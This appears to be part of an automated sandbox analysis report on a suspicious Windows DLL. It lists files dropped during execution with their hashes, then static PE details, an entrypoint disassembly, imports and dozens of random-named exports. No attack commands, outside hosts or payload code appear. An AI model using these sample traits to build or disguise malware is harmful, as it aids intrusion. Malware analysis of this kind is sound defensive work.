                                                                                                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB88.tmp.txt
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13340
                                                                                                        Entropy (8bit):2.695977367932866
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:9GiZYWXwi0W//XyYPYcW+HDUYEZ9ltFi0OqulJw4Xaadt6Mn5oNIF53:9jZDXRXyIOsDqadt6Mn5oSF53
                                                                                                        MD5:68FAB6CF0A1C67CFDA5D7D3172021128
                                                                                                        SHA1:7973B130C320119EFA6FCD2F5B8147D9BD67F297
                                                                                                        SHA-256:8F75ADED1A75A89914048407334B829B9423A00B2C712593584F317C4089CB96
                                                                                                        SHA-512:2361130FCE475AD64B66A490AA8B2157D2C214FEA636E47A42B21D3EDF58869C5443C77D0217DF18440ED3130CB48B42F6F5BDFD2C0D6691F9851FFFC6C1A222
                                                                                                        Malicious:false
                                                                                                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65536
                                                                                                        Entropy (8bit):0.11015467012570174
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:26sw0zXm/Ey6q9995ym0RVq3qQ10nMCldimE8eawHjcKRv:26hl68cm0eLyMCldzE9BHjc8
                                                                                                        MD5:304F8E8A64A52D1042A868BF53A274A9
                                                                                                        SHA1:34794F576562C1B52503BE3DB1A3A3C06FFFA4DC
                                                                                                        SHA-256:E0B53FD64378D8D6C08182571B8348AB0E6FABE16E1039EEA88BF81D8D28FB17
                                                                                                        SHA-512:D3D26DA964D20B8863DE90E292FE9E2886B12E21EAC71C987C9E3974DFC451BDE518CB8B2D4C758909F556B5ECF07965E65440B32351911EE0C16F559AA8850D
                                                                                                        Malicious:false
                                                                                                        Preview: ..........................................................................................n7.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................s........ .......^.............S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.........A.n7....................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65536
                                                                                                        Entropy (8bit):0.11239974699573353
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YFXm/Ey6q9995ym07h1miM3qQ10nMCldimE8eawHza1miI72d:fl68cm07h1tMLyMCldzE9BHza1tIqd
                                                                                                        MD5:254EF8903F3E46FE33D061FA09DB6F91
                                                                                                        SHA1:A2EEB09AA95C9B63CC6CC7BF8E15C5FE1524ADA7
                                                                                                        SHA-256:49855F5818E1B7C04CBC2B1B240B87366CC342BEAFD52A7D1072C151B91924DA
                                                                                                        SHA-512:DAFB84FD9692BDC0DFEDA69B3EC2AF7946AF77A7482C7681C4A6949B70B0CC6FB82951162CEC7BF42FF8043A47A51A18C0229173274FEBAA5A63D7E83CFDE09E
                                                                                                        Malicious:false
                                                                                                        Preview: ........................................................................................P.n7.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................s........ .....S.V.............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P...........n7....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65536
                                                                                                        Entropy (8bit):0.1124192532464876
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YHXm/Ey6q9995ym07h1mK2P3qQ10nMCldimE8eawHza1mKAvd:xl68cm07h1iPLyMCldzE9BHza1cd
                                                                                                        MD5:C515E0C260990B027D1F7FEBEF240EE1
                                                                                                        SHA1:FD40240D458157A83466D10DD178839CFDA17DC5
                                                                                                        SHA-256:46AA93A0B18E3B4E2450FE9D9C9C68771EBBB88A1BF3706EE5153F143BF9F114
                                                                                                        SHA-512:DFE7E9A406A0AB256ECCF3D6A534DF1A17649A0B7E4FA7948135114C56718E655B5068218799184263F038874BC263138911AB622F03EDE0C7E99360EA0CE87D
                                                                                                        Malicious:false
                                                                                                        Preview: ........................................................................................*.l7.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................s........ .....S.V.............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P..........l7....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001s (copy)
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65536
                                                                                                        Entropy (8bit):0.11015467012570174
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:26sw0zXm/Ey6q9995ym0RVq3qQ10nMCldimE8eawHjcKRv:26hl68cm0eLyMCldzE9BHjc8
                                                                                                        MD5:304F8E8A64A52D1042A868BF53A274A9
                                                                                                        SHA1:34794F576562C1B52503BE3DB1A3A3C06FFFA4DC
                                                                                                        SHA-256:E0B53FD64378D8D6C08182571B8348AB0E6FABE16E1039EEA88BF81D8D28FB17
                                                                                                        SHA-512:D3D26DA964D20B8863DE90E292FE9E2886B12E21EAC71C987C9E3974DFC451BDE518CB8B2D4C758909F556B5ECF07965E65440B32351911EE0C16F559AA8850D
                                                                                                        Malicious:false
                                                                                                        Preview: ..........................................................................................n7.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................s........ .......^.............S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.........A.n7....................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy)
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65536
                                                                                                        Entropy (8bit):0.11239974699573353
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YFXm/Ey6q9995ym07h1miM3qQ10nMCldimE8eawHza1miI72d:fl68cm07h1tMLyMCldzE9BHza1tIqd
                                                                                                        MD5:254EF8903F3E46FE33D061FA09DB6F91
                                                                                                        SHA1:A2EEB09AA95C9B63CC6CC7BF8E15C5FE1524ADA7
                                                                                                        SHA-256:49855F5818E1B7C04CBC2B1B240B87366CC342BEAFD52A7D1072C151B91924DA
                                                                                                        SHA-512:DAFB84FD9692BDC0DFEDA69B3EC2AF7946AF77A7482C7681C4A6949B70B0CC6FB82951162CEC7BF42FF8043A47A51A18C0229173274FEBAA5A63D7E83CFDE09E
                                                                                                        Malicious:false
                                                                                                        Preview: ........................................................................................P.n7.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................s........ .....S.V.............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P...........n7....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001". (copy)
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65536
                                                                                                        Entropy (8bit):0.1124192532464876
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YHXm/Ey6q9995ym07h1mK2P3qQ10nMCldimE8eawHza1mKAvd:xl68cm07h1iPLyMCldzE9BHza1cd
                                                                                                        MD5:C515E0C260990B027D1F7FEBEF240EE1
                                                                                                        SHA1:FD40240D458157A83466D10DD178839CFDA17DC5
                                                                                                        SHA-256:46AA93A0B18E3B4E2450FE9D9C9C68771EBBB88A1BF3706EE5153F143BF9F114
                                                                                                        SHA-512:DFE7E9A406A0AB256ECCF3D6A534DF1A17649A0B7E4FA7948135114C56718E655B5068218799184263F038874BC263138911AB622F03EDE0C7E99360EA0CE87D
                                                                                                        Malicious:false
                                                                                                        Preview: ........................................................................................*.l7.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................s........ .....S.V.............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P..........l7....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1572864
                                                                                                        Entropy (8bit):4.27200860359444
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:++xGt/B/0cpVBWRJEMXkhjlatIvt/VJkQy5XR9o+M1HfiwElbWF31:vxGt/B/0cpVBWRa9
                                                                                                        MD5:305D4C175594DF05FB83B45660590C29
                                                                                                        SHA1:01F281B8B203EFB2DDB2BC2844C383455CB37A14
                                                                                                        SHA-256:A5DFB5C0E762FF548CDAA3BB4E47BB467810EEFCB8E7C777AA83623D2EAF0D12
                                                                                                        SHA-512:B90E8CD82B16F0CD20BE9567D0AADE0C7A3AA608AE52A4E6F4F3CAF2931338B21DF526D37397A2482F937F0C4A8AA5D965B491A48F5407B59DD4FB5443C696CA
                                                                                                        Malicious:false
                                                                                                        Preview: regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...`...................................................................................................................................................................................................................................................................................................................................................=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16384
                                                                                                        Entropy (8bit):3.399358853964409
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:qKVgI51XWJvoCbYJ5FSEsWftx13xgoJ4XEaJNSdkyFn6yvRrsfkWfYjdsiDoXzCz:fjT5Rftx13PJ4XE7FFn7bZd1DoXzCz
                                                                                                        MD5:5BB0E539B72B081DABC6C8198F44E54F
                                                                                                        SHA1:6BB4C4196D6EEAFC231496D782B34FAE6F1E99E2
                                                                                                        SHA-256:849E684F49774DF0D027715B8421B45779C556BD0E7CC471CFB0A115BCA94E0D
                                                                                                        SHA-512:D1848DB6AE05565BB9B56E6149EE11F600FD101ECBB6959C8CE6B2A3A09CA5DE381C058880517F4E39F205D66DAE6B0A6F089550754C496B028D57634EFCF280
                                                                                                        Malicious:false
                                                                                                        Preview: regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...`...................................................................................................................................................................................................................................................................................................................................................=HvLE.>......Y.............D..m..o.....=.........0..............hbin................p.\..,..........nk,.\..`.................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .\..`........ ........................... .......Z.......................Root........lf......Root....nk .\..`.....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                        Entropy (8bit):6.970960867517191
                                                                                                        TrID:
                                                                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                        • DOS Executable Generic (2002/1) 0.20%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:2gyA5uNl6VPQUA.dll
                                                                                                        File size:387072
                                                                                                        MD5:5e20cb3466b66a9cdeac1ac74d9862e4
                                                                                                        SHA1:28ef4facb366de1fc7da62b975c8967997527c36
                                                                                                        SHA256:208939e34f46846c7c95383c6fea7813038b4dea87ea3819c157ccfbbf8aa09a
                                                                                                        SHA512:594039a003ac0c22a0a91c219c5cf50520994ead32f02efcfd8d79e57313c8ae041376fd0c3dcdfadf0472bee87363b28242a1d677e29cecb69127411fc6e722
                                                                                                        SSDEEP:6144:zBYrPMTsY8GR3j4fubnY6Zs/Bv6yM6aSTsfA2qL6jpXNcc6CEteuQJPIgtlpZ5L:yhmT4GbnYks/BJNWo2LjpScDEteuOIoZ
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0...Q...Q...Q..E#...Q..E#...Q..E#...Q../$...Q...$...Q...$...Q...$...Q..E#...Q...Q...Q...Q...Q../$...Q../$...Q..Rich.Q.........

                                                                                                        File Icon

                                                                                                        Icon Hash:74f0e4ecccdce0e4

                                                                                                        Static PE Info

                                                                                                        General

                                                                                                        Entrypoint:0x1001cac1
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x10000000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                        Time Stamp:0x61A73B52 [Wed Dec 1 09:07:30 2021 UTC]
                                                                                                        TLS Callbacks:0x1000c340
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:6
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:6
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:6
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:609402ef170a35cc0e660d7d95ac10ce

                                                                                                        Entrypoint Preview

                                                                                                        Instruction
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        cmp dword ptr [ebp+0Ch], 01h
                                                                                                        jne 00007F234CEF81A7h
                                                                                                        call 00007F234CEF8538h
                                                                                                        push dword ptr [ebp+10h]
                                                                                                        push dword ptr [ebp+0Ch]
                                                                                                        push dword ptr [ebp+08h]
                                                                                                        call 00007F234CEF8053h
                                                                                                        add esp, 0Ch
                                                                                                        pop ebp
                                                                                                        retn 000Ch
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        push dword ptr [ebp+08h]
                                                                                                        call 00007F234CEF8A4Eh
                                                                                                        pop ecx
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        jmp 00007F234CEF81AFh
                                                                                                        push dword ptr [ebp+08h]
                                                                                                        call 00007F234CEFC534h
                                                                                                        pop ecx
                                                                                                        test eax, eax
                                                                                                        je 00007F234CEF81B1h
                                                                                                        push dword ptr [ebp+08h]
                                                                                                        call 00007F234CEFC5B0h
                                                                                                        pop ecx
                                                                                                        test eax, eax
                                                                                                        je 00007F234CEF8188h
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        cmp dword ptr [ebp+08h], FFFFFFFFh
                                                                                                        je 00007F234CEF8B13h
                                                                                                        jmp 00007F234CEF8AF0h
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        push 00000000h
                                                                                                        call dword ptr [1002A08Ch]
                                                                                                        push dword ptr [ebp+08h]
                                                                                                        call dword ptr [1002A088h]
                                                                                                        push C0000409h
                                                                                                        call dword ptr [1002A040h]
                                                                                                        push eax
                                                                                                        call dword ptr [1002A090h]
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        sub esp, 00000324h
                                                                                                        push 00000017h
                                                                                                        call dword ptr [1002A094h]
                                                                                                        test eax, eax
                                                                                                        je 00007F234CEF81A7h
                                                                                                        push 00000002h
                                                                                                        pop ecx
                                                                                                        int 29h
                                                                                                        mov dword ptr [1005E278h], eax
                                                                                                        mov dword ptr [1005E274h], ecx
                                                                                                        mov dword ptr [1005E270h], edx
                                                                                                        mov dword ptr [1005E26Ch], ebx
                                                                                                        mov dword ptr [1005E268h], esi
                                                                                                        mov dword ptr [1005E264h], edi
                                                                                                        mov word ptr [eax], es

                                                                                                        Data Directories

                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x5b5900x614.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x5bba40x3c.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x600000x1bc0.reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x5a1dc0x54.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x5a3000x18.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5a2300x40.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x2a0000x154.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                        Sections

                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000x28bb40x28c00False0.53924822661data6.1540438823IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                        .rdata0x2a0000x323620x32400False0.817805503731data7.40645381596IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .data0x5d0000x1ba40x1200False0.287109375data2.60484752417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                        .pdata0x5f0000x4c40x600False0.360677083333AmigaOS bitmap font2.17228109861IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                        .reloc0x600000x1bc00x1c00False0.7880859375data6.62631718459IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                        Imports

                                                                                                        DLLImport
                                                                                                        KERNEL32.dllHeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetModuleHandleA, GetProcAddress, TlsGetValue, TlsSetValue, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, SetLastError, GetEnvironmentVariableW, GetLastError, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, ReleaseMutex, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, CloseHandle, GetStdHandle, GetConsoleMode, WriteFile, WriteConsoleW, TlsAlloc, GetCommandLineW, CreateFileA, GetTickCount64, CreateFileW, SetFilePointerEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RaiseException, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetFileType, GetStringTypeW, HeapSize, SetStdHandle, FlushFileBuffers, GetConsoleOutputCP, DecodePointer
                                                                                                        USER32.dllGetDC, ReleaseDC, GetWindowRect

                                                                                                        Exports

                                                                                                        NameOrdinalAddress
                                                                                                        Control_RunDLL10x100010a0
                                                                                                        axamexdrqyrgb20x100017b0
                                                                                                        bhramccfbdd30x10001690
                                                                                                        bptyjtyr40x10001640
                                                                                                        bxoqrnuua50x100016c0
                                                                                                        cegjceivzmgdcffk60x100014e0
                                                                                                        cgxpyqfkocm70x10001480
                                                                                                        chjbtsnqmvl80x10001540
                                                                                                        crfsijq90x10001730
                                                                                                        empxfws100x10001590
                                                                                                        fbgcvvbrlowsjsj110x10001550
                                                                                                        fjhmprw120x10001660
                                                                                                        gfqdajfucnxrv130x10001850
                                                                                                        hcloldazhuvj140x10001790
                                                                                                        idcumrbybo150x10001500
                                                                                                        ihvpwdsfllpvrzy160x10001750
                                                                                                        iuzqizpdhxqkmf170x100014c0
                                                                                                        jaarlqsruhrwpipt180x100016e0
                                                                                                        jndshbhgxdkvvtj190x10001600
                                                                                                        jniijdleqsyajeis200x10001650
                                                                                                        jtjqgma210x100016f0
                                                                                                        kffxtbzhfgbqlu220x10001630
                                                                                                        kwxkzdhqe230x100016d0
                                                                                                        lidhnvsukgiuabh240x100016b0
                                                                                                        ltcrkednwfkup250x10001820
                                                                                                        lvrmqgtvhsegpbvmq260x10001770
                                                                                                        mxvwvnerswyylp270x10001520
                                                                                                        ndlmbjceavqdintmv280x100017d0
                                                                                                        nvnriipkwrmxwsu290x10001510
                                                                                                        oafxfavxmi300x10001570
                                                                                                        ocwutlohg310x100014b0
                                                                                                        olcklbdvo320x10001680
                                                                                                        pawvqfmiz330x100015e0
                                                                                                        pdmomnjmmryopqza340x10001560
                                                                                                        plzkvjcbz350x10001710
                                                                                                        poasqvltrkgvepng360x10001840
                                                                                                        psjoyjhsrkg370x100015b0
                                                                                                        qdimtzieldbl380x10001620
                                                                                                        qzvngjfyuxpjag390x10001580
                                                                                                        relsounb400x100016a0
                                                                                                        rykebhcisi410x10001670
                                                                                                        snrvgvzpjh420x100017c0
                                                                                                        sqnfcfmocgbg430x10001740
                                                                                                        sxgllzweihxqxi440x10001760
                                                                                                        tgagxhhcfj450x10001780
                                                                                                        thjyvtvttwpah460x10001830
                                                                                                        uvypobslemtipv470x10001640
                                                                                                        vgidwtjsbwpxkdxj480x100017a0
                                                                                                        wahhdker490x100014a0
                                                                                                        wamqmispvbxt500x100015f0
                                                                                                        witvsjavqyw510x10001720
                                                                                                        wopabadcwdizvwlgk520x10001490
                                                                                                        wpzyecljz530x10001800
                                                                                                        wukgfirfwilhu540x100015d0
                                                                                                        xntbmrrxs550x100017f0
                                                                                                        xsxwxreryufxwuhh560x10001700
                                                                                                        xvgdevijtw570x10001610
                                                                                                        ydvqidso580x100015c0
                                                                                                        yggdjrsewuw590x100015a0
                                                                                                        zaeqdmhaky600x100017e0
                                                                                                        zakvwkjnk610x10001700
                                                                                                        zqbggkzy620x100014f0
                                                                                                        zqtdpertk630x100014d0
                                                                                                        zshfybkvzv640x10001810
                                                                                                        zxxopqyvfoesyhmup650x10001530

                                                                                                        Network Behavior

                                                                                                        Network Port Distribution

